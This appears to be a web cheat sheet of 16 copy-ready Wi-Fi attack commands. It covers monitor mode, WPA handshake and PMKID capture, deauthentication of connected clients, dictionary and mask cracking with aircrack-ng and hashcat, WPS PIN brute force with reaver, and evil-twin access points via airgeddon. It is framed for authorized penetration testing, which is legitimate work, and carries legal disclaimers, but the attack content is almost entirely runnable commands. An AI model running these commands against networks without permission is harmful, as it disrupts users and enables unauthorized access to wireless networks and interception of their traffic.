Wi-Fi Hacking Cheat Sheet

Wireless auditing workflow for networks you own or are authorized to test — monitor mode, handshake/PMKID capture, and cracking. (16 payloads)

Monitor Mode & Discovery

(4)

sudo airmon-ng check kill

Stop NetworkManager/wpa_supplicant processes that interfere with monitor mode.run before enabling monitor mode

sudo airmon-ng start wlan0

Put the adapter into monitor mode (creates wlan0mon).requires a monitor-capable card

sudo airodump-ng wlan0mon

Scan for APs and clients — note BSSID, channel (CH), and ESSID of your authorized target.discovery

sudo airodump-ng --band a wlan0mon

Scan the 5GHz band (default is 2.4GHz). Use -c to lock a channel.5GHz networks

WPA/WPA2 Handshake Capture

(3)

sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

Lock onto the target AP/channel and write captures; watch top-right for 'WPA handshake'.-w writes capture-01.cap

sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c <client> wlan0mon

Send a few deauth frames to a connected client to force a reconnect and capture the 4-way handshake. Keep it minimal — it disrupts users.authorized/owned networks only

aircrack-ng capture-01.cap

Verify the capture actually contains a valid handshake before cracking.validation

PMKID (Clientless) Capture

(2)

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

Capture PMKID directly from the AP — no connected client or deauth required.works against PMKID-enabled APs

hcxpcapngtool -o hash.22000 pmkid.pcapng

Convert the capture to hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL) format.modern unified format

Cracking

(4)

aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

Dictionary attack against a captured WPA2 handshake.CPU

hashcat -m 22000 hash.22000 rockyou.txt

GPU crack of the unified WPA hash (PMKID or EAPOL). Far faster than CPU.hashcat mode 22000

hashcat -m 22000 hash.22000 -a 3 ?d?d?d?d?d?d?d?d

Mask attack for known patterns (e.g., 8-digit default passwords / phone numbers).targeted brute force

hashcat -m 2500 capture.hccapx wordlist.txt

Legacy EAPOL-only format (older captures). Prefer 22000 going forward.backward compatibility

WPS, Evil Twin & Notes

(3)

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Brute-force a WPS PIN on APs with WPS enabled and unlocked.slow; many APs rate-limit/lock

sudo airgeddon

Menu-driven wrapper for evil-twin/captive-portal and handshake workflows.social-engineering AP attacks

# Only test networks you own or have explicit written authorization for

Intercepting Wi-Fi you don't own is illegal in most jurisdictions. Stay in scope.legal/ethics

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Post-Exploitation Cheat Sheet Hashcat Password Cracking Cheatsheet Hydra Brute Force Cheatsheet

Frequently asked questions

What is the Wi-Fi Hacking Cheat Sheet?+

It's a quick-reference collection of 16 Wi-Fi payloads for testing Wi-Fi Hacking vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Wi-Fi payloads?+

Copy any payload straight into your authorized test. Only test systems you have explicit permission to assess.

Are these Wi-Fi payloads free to use?+

Yes — this cheat sheet and all Wi-Fi payloads are completely free, with no account required. Everything runs in your browser.

$loading...